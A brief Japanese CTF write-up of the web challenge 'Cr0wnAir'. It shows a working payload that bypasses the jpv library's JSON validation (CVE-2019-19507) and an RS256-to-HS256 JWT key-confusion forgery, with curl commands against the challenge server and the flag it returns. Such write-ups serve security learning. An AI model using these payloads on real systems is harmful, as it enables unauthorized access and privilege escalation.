2/20 - 2/22という日程で開催された。zer0ptsで参加して7位。
[Web] Cr0wnAir
jpv というライブラリによってJSONの構造がチェックされているが、package-lock.json を見ると2.0.1と、CVE-2019-19507という脆弱性のある古いバージョンを使っていることがわかる。
const pattern = { firstName: /^\w{1,30}$/, lastName: /^\w{1,30}$/, passport: /^[0-9]{9}$/, ffp: /^(|CA[0-9]{8})$/, extras: [ {sssr: /^(BULK|UMNR|VGML)$/}, ], };
if (jpv.validate(data, pattern, { debug: true, mode: "strict" })) {
以下のような感じでバイパスできる。
$ node
...
> jpv.validate(JSON.parse('{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":[{"sssr":"FQTU"}]}'), pattern, {debug: true, mode: "strict"})
The value of ["FQTU"] does not match with [{}]
false
> jpv.validate(JSON.parse('{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":{"constructor":{"name":"Array"},"a":{"sssr":"FQTU"}}}'), pattern, {debug: true, mode: "strict"})
true
$ curl 'http://34.105.202.19:3000/checkin' -H 'Content-Type: application/json' --data-raw '{"firstName":"a","lastName":"b","passport":"123456789","ffp":"CA00000000","extras":{"constructor":{"name":"Array"},"a":{"sssr":"FQTU"}}}'
{"msg":"You have successfully checked in. Thank you for being a Cr0wnAir frequent flyer. Your loyalty has been rewarded and you have been marked for an upgrade, please visit the upgrades portal.","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJicm9uemUiLCJmZnAiOiJDQTAwMDAwMDAwIn0.NTEv7Fylr6mPFrC2Qf-YNAbq9uFS173dFvYIJuH4N_cmA8OwfDbS-_xu4h0pc3Nzob-BaqN6L06O2dtRYAu33l6KLKngp_benw8O8dQE-2ItcsXW9N5pfxmuDhid3eZwy4XStJy7kqiXHIIRaafLJJNhlQfpft3VGqqc-h7Xtkjet_HbtRBZIHN3ObqtVbAi0NqQRTaL_OM4m0l_uhF8NqFSjW9s4zz1mGXz5pjgjAu42NUk6bKoBvbNVFJ2Or_79cGYAmpFUumn3X5E69-oVN7SFxPFnjzEoOa8UHaJ3txCAEYrXvhld1YWpL7DSOIY3Yu3q8hvQ5de3ZgnOCC8Qg"}
JWTの改ざんについては、aventadorさんにAbusing JWT public keys without the public key – Silent Signal Techblogという記事を教えてもらって署名に使われているRS256の公開鍵を抽出し、それをHS256の秘密鍵として署名することでできた。
$ curl -X POST 'http://34.105.202.19:3000/upgrades/flag' -H "Authorization: a eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwic3RhdHVzIjoiZ29sZCIsImlhdCI6MTUxNjIzOTAyMn0.i4zsMzI1Hxc23vkL2PQRh-zECB
49iWPqDoRUowGEneY"
{"msg":"union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}"}
